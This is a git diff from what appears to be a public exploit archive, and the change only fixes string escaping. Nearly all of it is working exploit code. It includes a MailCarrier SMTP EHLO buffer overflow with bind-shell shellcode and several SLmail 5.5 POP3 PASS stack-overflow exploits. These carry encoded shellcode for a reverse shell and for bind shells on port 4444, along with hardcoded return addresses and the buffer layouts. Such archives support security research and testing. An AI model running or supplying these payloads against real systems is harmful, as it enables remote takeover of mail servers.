+"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x4d\x81"
+"\x59\x47\x83\xeb\xfc\xe2\xf4\xb1\x69\x0f\x47\x4d\x81\x0a\x12\x1b"
+"\xd6\xd2\x2b\x69\x99\xd2\x02\x71\x0a\x0d\x42\x35\x80\xb3\xcc\x07"
+"\x99\xd2\x1d\x6d\x80\xb2\xa4\x7f\xc8\xd2\x73\xc6\x80\xb7\x76\xb2"
+"\x7d\x68\x87\xe1\xb9\xb9\x33\x4a\x40\x96\x4a\x4c\x46\xb2\xb5\x76"
+"\xfd\x7d\x53\x38\x60\xd2\x1d\x69\x80\xb2\x21\xc6\x8d\x12\xcc\x17"
+"\x9d\x58\xac\xc6\x85\xd2\x46\xa5\x6a\x5b\x76\x8d\xde\x07\x1a\x16"
+"\x43\x51\x47\x13\xeb\x69\x1e\x29\x0a\x40\xcc\x16\x8d\xd2\x1c\x51"
+"\x0a\x42\xcc\x16\x89\x0a\x2f\xc3\xcf\x57\xab\xb2\x57\xd0\x80\xcc"
+"\x6d\x59\x46\x4d\x81\x0e\x11\x1e\x08\xbc\xaf\x6a\x81\x59\x47\xdd"
+"\x80\x59\x47\xfb\x98\x41\xa0\xe9\x98\x29\xae\xa8\xc8\xdf\x0e\xe9"
+"\x9b\x29\x80\xe9\x2c\x77\xae\x94\x88\xac\xea\x86\x6c\xa5\x7c\x1a"
+"\xd2\x6b\x18\x7e\xb3\x59\x1c\xc0\xca\x79\x16\xb2\x56\xd0\x98\xc4"
+"\x42\xd4\x32\x59\xeb\x5e\x1e\x1c\xd2\xa6\x73\xc2\x7e\x0c\x43\x14"
+"\x08\x5d\xc9\xaf\x73\x72\x60\x19\x7e\x6e\xb8\x18\xb1\x68\x87\x1d"
+"\xd1\x09\x17\x0d\xd1\x19\x17\xb2\xd4\x75\xce\x8a\xb0\x82\x14\x1e"
+"\xe9\x5b\x47\x37\xe8\xd0\xa7\x27\x91\x09\x10\xb2\xd4\x7d\x14\x1a"
+"\x7e\x0c\x6f\x1e\xd5\x0e\xb8\x18\xa1\xd0\x80\x25\xc2\x14\x03\x4d"
+"\x08\xba\xc0\xb7\xb0\x99\xca\x31\xa5\xf5\x2d\x58\xd8\xaa\xec\xca"
+"\x7b\xda\xab\x19\x47\x1d\x63\x5d\xc5\x3f\x80\x09\xa5\x65\x46\x4c"
+"\x08\x25\x63\x05\x08\x25\x63\x01\x08\x25\x63\x1d\x0c\x1d\x63\x5d"
+"\xd5\x09\x16\x1c\xd0\x18\x16\x04\xd0\x08\x14\x1c\x7e\x2c\x47\x25"
+"\xf3\xa7\xf4\x5b\x7e\x0c\x43\xb2\x51\xd0\xa1\xb2\xf4\x59\x2f\xe0"
+"\x58\x5c\x89\xb2\xd4\x5d\xce\x8e\xeb\xa6\xb8\x7b\x7e\x8a\xb8\x38"
+"\x81\x31\xb7\xc7\x85\x06\xb8\x18\x85\x68\x9c\x1e\x7e\x89\x47";
 
 
 struct sockaddr_in hrm,lar;
@@ -75,10 +75,10 @@ void shell(int sock)
   if( FD_ISSET(sock, &fd_read) ) {
    n=read(sock,buff,sizeof(buff));
    if (n == 0) {
-       printf (\"Connection closed.\\n\");
+       printf ("Connection closed.\n");
        exit(EXIT_FAILURE);
    } else if (n < 0) {
-       perror(\"read remote\");
+       perror("read remote");
        exit(EXIT_FAILURE);
    }
    write(1,buff,n);
@@ -86,7 +86,7 @@ void shell(int sock)
  
   if ( FD_ISSET(0, &fd_read) ) {
     if((n=read(0,buff,sizeof(buff)))<=0){
-      perror (\"read user\");
+      perror ("read user");
       exit(EXIT_FAILURE);
     }
     write(sock,buff,n);
@@ -104,10 +104,10 @@ int conn(char *ip,int port)
 	sockfd = socket(AF_INET,SOCK_STREAM,0);
 if((connect(sockfd,(struct sockaddr *)&hrm,sizeof(struct sockaddr))) < 0)
 	{
-	perror(\"connect\");
+	perror("connect");
 	exit(0);
 	}
-	printf(\"[x] Connected to: %s PORT: %d\\n\",ip,port);
+	printf("[x] Connected to: %s PORT: %d\n",ip,port);
 	return sockfd;
 }
 
@@ -117,31 +117,31 @@ int main(int argc, char *argv[])
 	int x,y;
 	if(argc<2)
 	{
-	printf(\"Usage: TargetIP.\\n\");
+	printf("Usage: TargetIP.\n");
 	exit(0);
 	}
-	printf(\"**MailCarrier Buffer Overflow Exploit by NoPh0BiA.**\\n\");
+	printf("**MailCarrier Buffer Overflow Exploit by NoPh0BiA.**\n");
 	t=argv[1];
-	memset(buffer,\'\\0\',5530);
+	memset(buffer,'\0',5530);
 	memset(crap,0x41,32);
 	memset(buffer,0x90,5095);
 	strcat(buffer,RET);
 	strcat(buffer,crap);
 	strcat(buffer,shellcode);
 	x = conn(t,PORT);
-	printf(\"[x] Sending evil buffer..\");
+	printf("[x] Sending evil buffer..");
 	sleep(3);
-	write(x,\"EHLO \",5);
+	write(x,"EHLO ",5);
 	sleep(1);
 	write(x,buffer,5530);
-	write(x,\"\\r\\n\\r\\n\",4);
+	write(x,"\r\n\r\n",4);
 	sleep(2);
 	close(x);
-	printf(\"done.\\n\");
-	printf(\"[x] Trying to connect to port 31337..\\n\");
+	printf("done.\n");
+	printf("[x] Trying to connect to port 31337..\n");
 	y = conn(t,RPORT);
-	printf(\"[x] 0wn3d!\\n\");
-	printf(\"\\r\\n\");
+	printf("[x] 0wn3d!\n");
+	printf("\r\n");
 	shell(y);
 		
 }
diff --git a/platforms/windows/remote/638.py b/platforms/windows/remote/638.py
index e2129e297..197a67517 100755
--- a/platforms/windows/remote/638.py
+++ b/platforms/windows/remote/638.py
@@ -7,67 +7,67 @@
 # Plain vanilla stack overflow in the PASS command  	#
 #                                                       #
 #########################################################
-# D:\\Projects\\BO>SLmail-5.5-POP3-PASS.py                #
+# D:\Projects\BO>SLmail-5.5-POP3-PASS.py                #
 #########################################################
-# D:\\Projects\\BO>nc -v 192.168.1.167 4444               #
+# D:\Projects\BO>nc -v 192.168.1.167 4444               #
 # localhost.lan [192.168.1.167] 4444 (?) open           #   
 # Microsoft Windows 2000 [Version 5.00.2195]            #
 # (C) Copyright 1985-2000 Microsoft Corp.               #
-# C:\\Program Files\\SLmail\\System>                       #
+# C:\Program Files\SLmail\System>                       #
 #########################################################
 
 import struct
 import socket
 
-print \"\\n\\n###############################################\"
-print \"\\nSLmail 5.5 POP3 PASS Buffer Overflow\"
-print \"\\nFound & coded by muts [at] offsec.com\"
-print \"\\nFor Educational Purposes Only!\" 
-print \"\\n\\n###############################################\"
+print "\n\n###############################################"
+print "\nSLmail 5.5 POP3 PASS Buffer Overflow"
+print "\nFound & coded by muts [at] offsec.com"
+print "\nFor Educational Purposes Only!" 
+print "\n\n###############################################"
 
 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 
 
-sc = \"\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x31\\xc9\\xb1\\x5e\\x81\\x73\\x17\\xe0\\x66\"
-sc += \"\\x1c\\xc2\\x83\\xeb\\xfc\\xe2\\xf4\\x1c\\x8e\\x4a\\xc2\\xe0\\x66\\x4f\\x97\\xb6\"
-sc += \"\\x31\\x97\\xae\\xc4\\x7e\\x97\\x87\\xdc\\xed\\x48\\xc7\\x98\\x67\\xf6\\x49\\xaa\"
-sc += \"\\x7e\\x97\\x98\\xc0\\x67\\xf7\\x21\\xd2\\x2f\\x97\\xf6\\x6b\\x67\\xf2\\xf3\\x1f\"
-sc += \"\\x9a\\x2d\\x02\\x4c\\x5e\\xfc\\xb6\\xe7\\xa7\\xd3\\xcf\\xe1\\xa1\\xf7\\x30\\xdb\"
-sc += \"\\x1a\\x38\\xd6\\x95\\x87\\x97\\x98\\xc4\\x67\\xf7\\xa4\\x6b\\x6a\\x57\\x49\\xba\"
-sc += \"\\x7a\\x1d\\x29\\x6b\\x62\\x97\\xc3\\x08\\x8d\\x1e\\xf3\\x20\\x39\\x42\\x9f\\xbb\"
-sc += \"\\xa4\\x14\\xc2\\xbe\\x0c\\x2c\\x9b\\x84\\xed\\x05\\x49\\xbb\\x6a\\x97\\x99\\xfc\"
-sc += \"\\xed\\x07\\x49\\xbb\\x6e\\x4f\\xaa\\x6e\\x28\\x12\\x2e\\x1f\\xb0\\x95\\x05\\x61\"
-sc += \"\\x8a\\x1c\\xc3\\xe0\\x66\\x4b\\x94\\xb3\\xef\\xf9\\x2a\\xc7\\x66\\x1c\\xc2\\x70\"
-sc += \"\\x67\\x1c\\xc2\\x56\\x7f\\x04\\x25\\x44\\x7f\\x6c\\x2b\\x05\\x2f\\x9a\\x8b\\x44\"
-sc += \"\\x7c\\x6c\\x05\\x44\\xcb\\x32\\x2b\\x39\\x6f\\xe9\\x6f\\x2b\\x8b\\xe0\\xf9\\xb7\"
-sc += \"\\x35\\x2e\\x9d\\xd3\\x54\\x1c\\x99\\x6d\\x2d\\x3c\\x93\\x1f\\xb1\\x95\\x1d\\x69\"
-sc += \"\\xa5\\x91\\xb7\\xf4\\x0c\\x1b\\x9b\\xb1\\x35\\xe3\\xf6\\x6f\\x99\\x49\\xc6\\xb9\"
-sc += \"\\xef\\x18\\x4c\\x02\\x94\\x37\\xe5\\xb4\\x99\\x2b\\x3d\\xb5\\x56\\x2d\\x02\\xb0\"
-sc += \"\\x36\\x4c\\x92\\xa0\\x36\\x5c\\x92\\x1f\\x33\\x30\\x4b\\x27\\x57\\xc7\\x91\\xb3\"
-sc += \"\\x0e\\x1e\\xc2\\xf1\\x3a\\x95\\x22\\x8a\\x76\\x4c\\x95\\x1f\\x33\\x38\\x91\\xb7\"
-sc += \"\\x99\\x49\\xea\\xb3\\x32\\x4b\\x3d\\xb5\\x46\\x95\\x05\\x88\\x25\\x51\\x86\\xe0\"
-sc += \"\\xef\\xff\\x45\\x1a\\x57\\xdc\\x4f\\x9c\\x42\\xb0\\xa8\\xf5\\x3f\\xef\\x69\\x67\"
-sc += \"\\x9c\\x9f\\x2e\\xb4\\xa0\\x58\\xe6\\xf0\\x22\\x7a\\x05\\xa4\\x42\\x20\\xc3\\xe1\"
-sc += \"\\xef\\x60\\xe6\\xa8\\xef\\x60\\xe6\\xac\\xef\\x60\\xe6\\xb0\\xeb\\x58\\xe6\\xf0\"
-sc += \"\\x32\\x4c\\x93\\xb1\\x37\\x5d\\x93\\xa9\\x37\\x4d\\x91\\xb1\\x99\\x69\\xc2\\x88\"
-sc += \"\\x14\\xe2\\x71\\xf6\\x99\\x49\\xc6\\x1f\\xb6\\x95\\x24\\x1f\\x13\\x1c\\xaa\\x4d\"
-sc += \"\\xbf\\x19\\x0c\\x1f\\x33\\x18\\x4b\\x23\\x0c\\xe3\\x3d\\xd6\\x99\\xcf\\x3d\\x95\"
-sc += \"\\x66\\x74\\x32\\x6a\\x62\\x43\\x3d\\xb5\\x62\\x2d\\x19\\xb3\\x99\\xcc\\xc2\"
+sc = "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\xe0\x66"
+sc += "\x1c\xc2\x83\xeb\xfc\xe2\xf4\x1c\x8e\x4a\xc2\xe0\x66\x4f\x97\xb6"
+sc += "\x31\x97\xae\xc4\x7e\x97\x87\xdc\xed\x48\xc7\x98\x67\xf6\x49\xaa"
+sc += "\x7e\x97\x98\xc0\x67\xf7\x21\xd2\x2f\x97\xf6\x6b\x67\xf2\xf3\x1f"
+sc += "\x9a\x2d\x02\x4c\x5e\xfc\xb6\xe7\xa7\xd3\xcf\xe1\xa1\xf7\x30\xdb"
+sc += "\x1a\x38\xd6\x95\x87\x97\x98\xc4\x67\xf7\xa4\x6b\x6a\x57\x49\xba"
+sc += "\x7a\x1d\x29\x6b\x62\x97\xc3\x08\x8d\x1e\xf3\x20\x39\x42\x9f\xbb"
+sc += "\xa4\x14\xc2\xbe\x0c\x2c\x9b\x84\xed\x05\x49\xbb\x6a\x97\x99\xfc"
+sc += "\xed\x07\x49\xbb\x6e\x4f\xaa\x6e\x28\x12\x2e\x1f\xb0\x95\x05\x61"
+sc += "\x8a\x1c\xc3\xe0\x66\x4b\x94\xb3\xef\xf9\x2a\xc7\x66\x1c\xc2\x70"
+sc += "\x67\x1c\xc2\x56\x7f\x04\x25\x44\x7f\x6c\x2b\x05\x2f\x9a\x8b\x44"
+sc += "\x7c\x6c\x05\x44\xcb\x32\x2b\x39\x6f\xe9\x6f\x2b\x8b\xe0\xf9\xb7"
+sc += "\x35\x2e\x9d\xd3\x54\x1c\x99\x6d\x2d\x3c\x93\x1f\xb1\x95\x1d\x69"
+sc += "\xa5\x91\xb7\xf4\x0c\x1b\x9b\xb1\x35\xe3\xf6\x6f\x99\x49\xc6\xb9"
+sc += "\xef\x18\x4c\x02\x94\x37\xe5\xb4\x99\x2b\x3d\xb5\x56\x2d\x02\xb0"
+sc += "\x36\x4c\x92\xa0\x36\x5c\x92\x1f\x33\x30\x4b\x27\x57\xc7\x91\xb3"
+sc += "\x0e\x1e\xc2\xf1\x3a\x95\x22\x8a\x76\x4c\x95\x1f\x33\x38\x91\xb7"
+sc += "\x99\x49\xea\xb3\x32\x4b\x3d\xb5\x46\x95\x05\x88\x25\x51\x86\xe0"
+sc += "\xef\xff\x45\x1a\x57\xdc\x4f\x9c\x42\xb0\xa8\xf5\x3f\xef\x69\x67"
+sc += "\x9c\x9f\x2e\xb4\xa0\x58\xe6\xf0\x22\x7a\x05\xa4\x42\x20\xc3\xe1"
+sc += "\xef\x60\xe6\xa8\xef\x60\xe6\xac\xef\x60\xe6\xb0\xeb\x58\xe6\xf0"
+sc += "\x32\x4c\x93\xb1\x37\x5d\x93\xa9\x37\x4d\x91\xb1\x99\x69\xc2\x88"
+sc += "\x14\xe2\x71\xf6\x99\x49\xc6\x1f\xb6\x95\x24\x1f\x13\x1c\xaa\x4d"
+sc += "\xbf\x19\x0c\x1f\x33\x18\x4b\x23\x0c\xe3\x3d\xd6\x99\xcf\x3d\x95"
+sc += "\x66\x74\x32\x6a\x62\x43\x3d\xb5\x62\x2d\x19\xb3\x99\xcc\xc2"
 
 #Tested on Win2k SP4 Unpatched
 # Change ret address if needed
-buffer = \'\\x41\' * 4654 + struct.pack(\'<L\', 0x783d6ddf) + \'\\x90\'*32 + sc 
+buffer = '\x41' * 4654 + struct.pack('<L', 0x783d6ddf) + '\x90'*32 + sc 
 try:
-	print \"\\nSending evil buffer...\"
-	s.connect((\'192.168.1.167\',110))
+	print "\nSending evil buffer..."
+	s.connect(('192.168.1.167',110))
 	data = s.recv(1024)
-	s.send(\'USER username\' +\'\\r\\n\')
+	s.send('USER username' +'\r\n')
 	data = s.recv(1024)
-	s.send(\'PASS \' + buffer + \'\\r\\n\')
+	s.send('PASS ' + buffer + '\r\n')
 	data = s.recv(1024)
 	s.close()
-	print \"\\nDone! Try connecting to port 4444 on victim machine.\"
+	print "\nDone! Try connecting to port 4444 on victim machine."
 except:
-	print \"Could not connect to POP3!\"
+	print "Could not connect to POP3!"
 
 # milw0rm.com [2004-11-18]
diff --git a/platforms/windows/remote/643.c b/platforms/windows/remote/643.c
index 8ec217489..670dd0d2f 100755
--- a/platforms/windows/remote/643.c
+++ b/platforms/windows/remote/643.c
@@ -9,29 +9,29 @@
 #include <netdb.h>
 #include <string.h>
  
-define retadd \"\\x9f\\x45\\x3a\\x77\" /*win2k server sp4 0x773a459f*/
+define retadd "\x9f\x45\x3a\x77" /*win2k server sp4 0x773a459f*/
 #define port 110
 
 /* revshell العراق القراصنة المجموعة*/
 char shellcode[] =
-\"\\xfc\\x6a\\xeb\\x4d\\xe8\\xf9\\xff\\xff\\xff\\x60\\x8b\\x6c\\x24\\x24\\x8b\\x45\"
-\"\\x3c\\x8b\\x7c\\x05\\x78\\x01\\xef\\x8b\\x4f\\x18\\x8b\\x5f\\x20\\x01\\xeb\\x49\"
-\"\\x8b\\x34\\x8b\\x01\\xee\\x31\\xc0\\x99\\xac\\x84\\xc0\\x74\\x07\\xc1\\xca\\x0d\"
-\"\\x01\\xc2\\xeb\\xf4\\x3b\\x54\\x24\\x28\\x75\\xe5\\x8b\\x5f\\x24\\x01\\xeb\\x66\"
-\"\\x8b\\x0c\\x4b\\x8b\\x5f\\x1c\\x01\\xeb\\x03\\x2c\\x8b\\x89\\x6c\\x24\\x1c\\x61\"
-\"\\xc3\\x31\\xdb\\x64\\x8b\\x43\\x30\\x8b\\x40\\x0c\\x8b\\x70\\x1c\\xad\\x8b\\x40\"
-\"\\x08\\x5e\\x68\\x8e\\x4e\\x0e\\xec\\x50\\xff\\xd6\\x66\\x53\\x66\\x68\\x33\\x32\"
-\"\\x68\\x77\\x73\\x32\\x5f\\x54\\xff\\xd0\\x68\\xcb\\xed\\xfc\\x3b\\x50\\xff\\xd6\"
-\"\\x5f\\x89\\xe5\\x66\\x81\\xed\\x08\\x02\\x55\\x6a\\x02\\xff\\xd0\\x68\\xd9\\x09\"
-\"\\xf5\\xad\\x57\\xff\\xd6\\x53\\x53\\x53\\x53\\x43\\x53\\x43\\x53\\xff\\xd0\\x68\"
-\"\\x7f\\x00\\x00\\x01\\x66\\x68\\x10\\xe1\\x66\\x53\\x89\\xe1\\x95\\x68\\xec\\xf9\"
-\"\\xaa\\x60\\x57\\xff\\xd6\\x6a\\x10\\x51\\x55\\xff\\xd0\\x66\\x6a\\x64\\x66\\x68\"
-\"\\x63\\x6d\\x6a\\x50\\x59\\x29\\xcc\\x89\\xe7\\x6a\\x44\\x89\\xe2\\x31\\xc0\\xf3\"
-\"\\xaa\\x95\\x89\\xfd\\xfe\\x42\\x2d\\xfe\\x42\\x2c\\x8d\\x7a\\x38\\xab\\xab\\xab\"
-\"\\x68\\x72\\xfe\\xb3\\x16\\xff\\x75\\x28\\xff\\xd6\\x5b\\x57\\x52\\x51\\x51\\x51\"
-\"\\x6a\\x01\\x51\\x51\\x55\\x51\\xff\\xd0\\x68\\xad\\xd9\\x05\\xce\\x53\\xff\\xd6\"
-\"\\x6a\\xff\\xff\\x37\\xff\\xd0\\x68\\xe7\\x79\\xc6\\x79\\xff\\x75\\x04\\xff\\xd6\"
-\"\\xff\\x77\\xfc\\xff\\xd0\\x68\\xf0\\x8a\\x04\\x5f\\x53\\xff\\xd6\\xff\\xd0\";
+"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
+"\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
+"\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
+"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
+"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
+"\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
+"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
+"\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
+"\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
+"\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0\x68"
+"\x7f\x00\x00\x01\x66\x68\x10\xe1\x66\x53\x89\xe1\x95\x68\xec\xf9"
+"\xaa\x60\x57\xff\xd6\x6a\x10\x51\x55\xff\xd0\x66\x6a\x64\x66\x68"
+"\x63\x6d\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89\xe2\x31\xc0\xf3"
+"\xaa\x95\x89\xfd\xfe\x42\x2d\xfe\x42\x2c\x8d\x7a\x38\xab\xab\xab"
+"\x68\x72\xfe\xb3\x16\xff\x75\x28\xff\xd6\x5b\x57\x52\x51\x51\x51"
+"\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53\xff\xd6"
+"\x6a\xff\xff\x37\xff\xd0\x68\xe7\x79\xc6\x79\xff\x75\x04\xff\xd6"
+"\xff\x77\xfc\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0";
  
 struct sockaddr_in plm,lar,target;
  
@@ -45,10 +45,10 @@ int conn(char *ip)
  sockfd = socket(AF_INET,SOCK_STREAM,0);
 if((connect(sockfd,(struct sockaddr *)&plm,sizeof(struct sockaddr))) < 0)
 {
- perror(\"[-] connect error!\");
+ perror("[-] connect error!");
  exit(0);
 }
- printf(\"[*] Connected to: %s.\\n\",ip);
+ printf("[*] Connected to: %s.\n",ip);
  return sockfd;
 }
  
@@ -69,17 +69,17 @@ int main(int argc, char *argv[])
     strcat(buffer, nop);
     strcat(buffer, shellcode);
 
-    printf(\"[+] SLMAIL Remote buffer overflow exploit in POP3 PASS by Haroon Rashid Astwat.\\n\");
-    xs = conn(\"192.168.224.144\");
+    printf("[+] SLMAIL Remote buffer overflow exploit in POP3 PASS by Haroon Rashid Astwat.\n");
+    xs = conn("192.168.224.144");
     read(xs, out, 1024);
-    printf(\"[*] %s\", out);
-    write(xs,\"USER username\\r\\n\", 15);
+    printf("[*] %s", out);
+    write(xs,"USER username\r\n", 15);
     read(xs, out, 1024);
-    printf(\"[*] %s\", out);
-    write(xs,\"PASS \",5);
+    printf("[*] %s", out);
+    write(xs,"PASS ",5);
     write(xs,buffer,strlen(buffer));
-    printf(\"Shellcode len: %d bytes\\n\",strlen(shellcode));
-    printf(\"Buffer len: %d bytes\\n\",strlen(buffer));
-    write(xs,\"\\r\\n\",4);
+    printf("Shellcode len: %d bytes\n",strlen(shellcode));
+    printf("Buffer len: %d bytes\n",strlen(buffer));
+    write(xs,"\r\n",4);
     close(xs);  
 }
\ No newline at end of file
diff --git a/platforms/windows/remote/646.c b/platforms/windows/remote/646.c
index bdf1976c6..c24c9e1df 100755
--- a/platforms/windows/remote/646.c
+++ b/platforms/windows/remote/646.c
@@ -10,36 +10,36 @@ SLMAIL REMOTE PASSWD BOF - Ivan Ivanovic Ivanov Иван-дурак
 
 // [*] bind 4444 
 unsigned char shellcode[] = 
-\"\\xfc\\x6a\\xeb\\x4d\\xe8\\xf9\\xff\\xff\\xff\\x60\\x8b\\x6c\\x24\\x24\\x8b\\x45\"
-\"\\x3c\\x8b\\x7c\\x05\\x78\\x01\\xef\\x8b\\x4f\\x18\\x8b\\x5f\\x20\\x01\\xeb\\x49\"
-\"\\x8b\\x34\\x8b\\x01\\xee\\x31\\xc0\\x99\\xac\\x84\\xc0\\x74\\x07\\xc1\\xca\\x0d\"
-\"\\x01\\xc2\\xeb\\xf4\\x3b\\x54\\x24\\x28\\x75\\xe5\\x8b\\x5f\\x24\\x01\\xeb\\x66\"
-\"\\x8b\\x0c\\x4b\\x8b\\x5f\\x1c\\x01\\xeb\\x03\\x2c\\x8b\\x89\\x6c\\x24\\x1c\\x61\"
-\"\\xc3\\x31\\xdb\\x64\\x8b\\x43\\x30\\x8b\\x40\\x0c\\x8b\\x70\\x1c\\xad\\x8b\\x40\"
-\"\\x08\\x5e\\x68\\x8e\\x4e\\x0e\\xec\\x50\\xff\\xd6\\x66\\x53\\x66\\x68\\x33\\x32\"
-\"\\x68\\x77\\x73\\x32\\x5f\\x54\\xff\\xd0\\x68\\xcb\\xed\\xfc\\x3b\\x50\\xff\\xd6\"
-\"\\x5f\\x89\\xe5\\x66\\x81\\xed\\x08\\x02\\x55\\x6a\\x02\\xff\\xd0\\x68\\xd9\\x09\"
-\"\\xf5\\xad\\x57\\xff\\xd6\\x53\\x53\\x53\\x53\\x53\\x43\\x53\\x43\\x53\\xff\\xd0\"
-\"\\x66\\x68\\x11\\x5c\\x66\\x53\\x89\\xe1\\x95\\x68\\xa4\\x1a\\x70\\xc7\\x57\\xff\"
-\"\\xd6\\x6a\\x10\\x51\\x55\\xff\\xd0\\x68\\xa4\\xad\\x2e\\xe9\\x57\\xff\\xd6\\x53\"
-\"\\x55\\xff\\xd0\\x68\\xe5\\x49\\x86\\x49\\x57\\xff\\xd6\\x50\\x54\\x54\\x55\\xff\"
-\"\\xd0\\x93\\x68\\xe7\\x79\\xc6\\x79\\x57\\xff\\xd6\\x55\\xff\\xd0\\x66\\x6a\\x64\"
-\"\\x66\\x68\\x63\\x6d\\x89\\xe5\\x6a\\x50\\x59\\x29\\xcc\\x89\\xe7\\x6a\\x44\\x89\"
-\"\\xe2\\x31\\xc0\\xf3\\xaa\\xfe\\x42\\x2d\\xfe\\x42\\x2c\\x93\\x8d\\x7a\\x38\\xab\"
-\"\\xab\\xab\\x68\\x72\\xfe\\xb3\\x16\\xff\\x75\\x44\\xff\\xd6\\x5b\\x57\\x52\\x51\"
-\"\\x51\\x51\\x6a\\x01\\x51\\x51\\x55\\x51\\xff\\xd0\\x68\\xad\\xd9\\x05\\xce\\x53\"
-\"\\xff\\xd6\\x6a\\xff\\xff\\x37\\xff\\xd0\\x8b\\x57\\xfc\\x83\\xc4\\x64\\xff\\xd6\"
-\"\\x52\\xff\\xd0\\x68\\xf0\\x8a\\x04\\x5f\\x53\\xff\\xd6\\xff\\xd0\";
+"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
+"\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
+"\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
+"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
+"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
+"\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
+"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
+"\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
+"\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
+"\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0"
+"\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff"
+"\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53"
+"\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff"
+"\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64"
+"\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
+"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab"
+"\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51"
+"\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53"
+"\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6"
+"\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0";
 
 void exploit(int sock) {
       FILE *test;
       int *ptr;
-      char userbuf[] = \"USER madivan\\r\\n\";
+      char userbuf[] = "USER madivan\r\n";
       char evil[3001];
       char buf[3012];
       char receive[1024];
-      char nopsled[] = \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"
-                       \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\";
+      char nopsled[] = "\x90\x90\x90\x90\x90\x90\x90\x90"
+                       "\x90\x90\x90\x90\x90\x90\x90\x90";
       memset(buf, 0x00, 3012);
       memset(evil, 0x00, 3001);
       memset(evil, 0x43, 3000);
@@ -52,20 +52,20 @@ void exploit(int sock) {
 
       // banner
       recv(sock, receive, 200, 0);
-      printf(\"[+] %s\", receive);
+      printf("[+] %s", receive);
       // user
-      printf(\"[+] Sending Username...\\n\");
+      printf("[+] Sending Username...\n");
       send(sock, userbuf, strlen(userbuf), 0);
       recv(sock, receive, 200, 0);
-      printf(\"[+] %s\", receive);
+      printf("[+] %s", receive);
       // passwd
-      printf(\"[+] Sending Evil buffer...\\n\");
-      sprintf(buf, \"PASS %s\\r\\n\", evil);
-      //test = fopen(\"test.txt\", \"w\");
-      //fprintf(test, \"%s\", buf);
+      printf("[+] Sending Evil buffer...\n");
+      sprintf(buf, "PASS %s\r\n", evil);
+      //test = fopen("test.txt", "w");
+      //fprintf(test, "%s", buf);
       //fclose(test);
       send(sock, buf, strlen(buf), 0);
-      printf(\"[*] Done! Connect to the host on port 4444...\\n\\n\");
+      printf("[*] Done! Connect to the host on port 4444...\n\n");
 }
 
 int connect_target(char *host, u_short port)
@@ -80,23 +80,23 @@ int connect_target(char *host, u_short port)
 
     hp = gethostbyname(host);
     if (hp == NULL) {
-        printf(\"gethostbyname() error!\\n\"); exit(0);
+        printf("gethostbyname() error!\n"); exit(0);
     }
-    printf(\"[+] Connecting to %s\\n\", host);
+    printf("[+] Connecting to %s\n", host);
     sa.sin_family = AF_INET;
     sa.sin_port = htons(port);
     sa.sin_addr = **((struct in_addr **) hp->h_addr_list);
 
     sock = socket(AF_INET, SOCK_STREAM, 0);
     if (sock < 0)      {
-        printf(\"[-] socket blah?\\n\");
+        printf("[-] socket blah?\n");
         exit(0);
         }
